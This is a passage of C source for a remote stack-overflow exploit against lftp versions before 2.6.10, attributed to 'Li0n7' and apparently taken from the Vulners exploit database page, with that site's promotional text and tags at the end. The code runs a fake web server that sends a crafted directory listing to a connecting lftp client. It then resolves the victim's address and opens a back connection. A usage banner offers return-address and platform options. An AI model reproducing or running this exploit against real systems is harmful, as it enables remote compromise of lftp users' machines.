&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"Date:&nbsp;Sun,&nbsp;21&nbsp;Dec&nbsp;2003&nbsp;16:29:44&nbsp;GMT\\n\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"Last-Modified:&nbsp;Sun,&nbsp;21&nbsp;Dec&nbsp;2003&nbsp;16:23:41&nbsp;GMT\\n\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"Accept-Ranges:&nbsp;bytes\\n\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"Connection:&nbsp;close\\n\\n\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"<a&nbsp;href=\\\"/\\\">empty</a>\\tFri&nbsp;May&nbsp;30&nbsp;10:09:06&nbsp;2001&nbsp;%s\\n\",build((char*)inet_ntoa(s.sin_addr)));

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;size&nbsp;=&nbsp;send(fd2,&nbsp;request,&nbsp;strlen(request),&nbsp;0);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(size&nbsp;<&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;close(fd2);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sleep(2);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;host&nbsp;=&nbsp;resolve_host((char&nbsp;*)inet_ntoa(s.sin_addr));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;back_connection(host);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cancel&nbsp;=&nbsp;1;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(cancel&nbsp;==&nbsp;1)&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;close(fd2);
&nbsp;&nbsp;}
&nbsp;&nbsp;return;
}


long&nbsp;resolve_host(u_char&nbsp;*host_name)
{
&nbsp;&nbsp;struct&nbsp;in_addr&nbsp;addr;
&nbsp;&nbsp;struct&nbsp;hostent&nbsp;*host_ent;

&nbsp;&nbsp;addr.s_addr&nbsp;=&nbsp;inet_addr(host_name);
&nbsp;&nbsp;if&nbsp;(addr.s_addr&nbsp;==&nbsp;-1)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;host_ent&nbsp;=&nbsp;gethostbyname(host_name);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!host_ent)&nbsp;return(0);
&nbsp;&nbsp;&nbsp;&nbsp;memcpy((char&nbsp;*)&addr.s_addr,&nbsp;host_ent->h_addr,&nbsp;host_ent->h_length);
&nbsp;&nbsp;}

&nbsp;&nbsp;return(addr.s_addr);
}


void
die(char&nbsp;*argv)
{
&nbsp;&nbsp;int&nbsp;i;
&nbsp;&nbsp;fprintf(stdout,\"\\t&nbsp;Remote&nbsp;exploit&nbsp;for&nbsp;lftp&nbsp;<&nbsp;2.6.10&nbsp;by&nbsp;Li0n7&nbsp;\\n\");
&nbsp;&nbsp;fprintf(stdout,\"\\n&nbsp;usage:&nbsp;%s&nbsp;[-f&nbsp;<path>][-p&nbsp;<port>][-r&nbsp;<ret>][-t&nbsp;<target>]\\n\",argv);
&nbsp;&nbsp;fprintf(stdout,\"&nbsp;-f&nbsp;<path>:&nbsp;create&nbsp;<path>index.html\\n\");
&nbsp;&nbsp;fprintf(stdout,\"&nbsp;-p&nbsp;<port>:&nbsp;run&nbsp;a&nbsp;fake&nbsp;lftp&nbsp;server&nbsp;on&nbsp;port&nbsp;<port>&nbsp;(default:&nbsp;80)\\n\");
&nbsp;&nbsp;fprintf(stdout,\"&nbsp;-r&nbsp;<ret>:&nbsp;return&nbsp;address&nbsp;you&nbsp;would&nbsp;like&nbsp;to&nbsp;use\\n\");
&nbsp;&nbsp;fprintf(stdout,\"&nbsp;-t&nbsp;<target>:&nbsp;choose&nbsp;the&nbsp;target&nbsp;among&nbsp;the&nbsp;platforms&nbsp;available\\n\");
&nbsp;&nbsp;fprintf(stdout,\"&nbsp;Platforms&nbsp;supported&nbsp;are:\\n\");
&nbsp;&nbsp;for(i=0;&nbsp;exp_os[i].plat&nbsp;!=&nbsp;NULL;&nbsp;i++)
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"&nbsp;num:&nbsp;%i&nbsp;-&nbsp;%s&nbsp;-&nbsp;0x%x\\n\",i,exp_os[i].plat,exp_os[i].ret);
&nbsp;&nbsp;fprintf(stdout,\"\\n&nbsp;Vulnerability&nbsp;discovered&nbsp;by&nbsp;Ulf&nbsp;Harnhammar&nbsp;<[email protected]>&nbsp;\\n\");
&nbsp;&nbsp;fprintf(stdout,\"&nbsp;Contact&nbsp;me:&nbsp;[email protected]\\n\\n\");
&nbsp;&nbsp;exit(1);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1
lftpstack-based overflowexploitli0n7try_netscape_proxyvulnerabilityulf harnhammarremoteproof-of-conceptgdbparametersplatforms
26